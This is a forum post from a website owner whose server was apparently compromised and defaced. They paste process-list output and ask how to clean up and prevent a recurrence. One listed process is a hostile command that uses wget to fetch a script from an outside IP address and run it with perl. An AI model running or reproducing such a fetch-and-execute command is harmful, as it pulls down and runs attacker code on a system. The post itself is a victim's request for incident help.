Hi guys,
I was ttying to check my email this morning, when I realized my mail server was down. I go to check my website and see "exlab ownz!" writen on my main page. I restarted my mail server then checked around to see if anything else was damaged. Aparently the punk only changed the index.php, but I'm not sure what else he might have done. I did a "ps -aux" and got:
nobody 2715 0.0 1.9 18268 9692 ? S May20 0:00 /usr/local/apache2/bin/httpd -k start
nobody 2986 0.0 1.9 18212 9684 ? S May20 0:05 /usr/local/apache2/bin/httpd -k start
nobody 2988 0.0 1.9 18340 9864 ? S May20 0:08 /usr/local/apache2/bin/httpd -k start
nobody 3000 0.0 0.0 0 0 ? Z May20 0:00 [sh] <defunct>
nobody 3002 0.0 0.6 7312 3516 ? S May20 0:00 /usr/local/apache/bin/httpd -DSSL
nobody 13238 0.0 0.2 4464 1060 ? S May20 0:00 sh -c wget
http://213.251.163.94//squirrelmail/src/ping.txt;mv ping.txt temp2006;perl temp2006
nobody 21173 0.0 2.3 20656 12144 ? S 07:13 0:00 /usr/local/apache2/bin/httpd -k start
some of this stuff seems unusual.
If anybody has any insight on how to stop this down i would apreciate it.
I would also apreciate sugestions on how to prevent this from hapening again.
Thanks